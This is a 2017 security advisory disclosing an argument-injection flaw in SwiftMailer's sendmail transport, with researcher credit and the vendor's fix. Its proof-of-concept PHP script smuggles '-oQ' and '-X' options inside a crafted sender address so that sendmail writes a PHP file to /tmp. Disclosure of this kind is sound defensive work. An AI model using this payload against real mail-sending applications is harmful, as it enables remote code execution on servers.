SSD Advisory – SwiftMailer Remote Code Execution

January 23, 2017 admin SecuriTeam Secure Disclosure

Vulnerability Summary
The following report describes a remote code execution vulnerability found in SwiftMailer. The vulnerability allows an attacker injecting sendmail program due to insufficient address sanitization. Swift Mailer integrates into any web app written in PHP 5, offering a flexible object-oriented approach to sending emails with a multitude of features

Credit
An independent security researcher Dawid Golunski (https://legalhackers.com/) has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program

Vulnerability Details

When using SwitMailer to send emails with Sendmail transport, a malicious user might be able to inject arbitrary parameters to sendmail program due to insufficient address sanitization. If an attacker can control email headers , he could bypass sanitization by adding additional quote characters within a malicious email address.

Prof of Concept

 <?php     require_once ‘swiftmailer-5.x/lib/swift_required.php’;      // Sendmail  //$transport = Swift_SendmailTransport::newInstance(‘/usr/sbin/sendmail -bs’);    // Mail  $transport = Swift_MailTransport::newInstance();      // Create the Mailer using your created Transport  $mailer = Swift_Mailer::newInstance($transport);    // Create a message  $message = Swift_Message::newInstance(‘Wonderful Subject’)    ->setFrom(array(‘”john ‘ -oQ/tmp/ -X/tmp/exp.php heh”@test.com’ => ‘John Doe’))    ->setTo(array(‘receiver@domain.org’, ‘other@domain.org’ => ‘A name’))    ->setBody(‘Here is the message itself’)    ;    // Send the message  $result = $mailer->send($message);

In this example , -X -oQ parameters would be injected to the sendmail program and write out a /tmp/exp.php file
as a result if the MTA in use was Sendmail.

Vendor response
The vendor has released SwiftMailer version 5.4.5 to address the vulnerability

https://blogs.securiteam.com/index.php/feed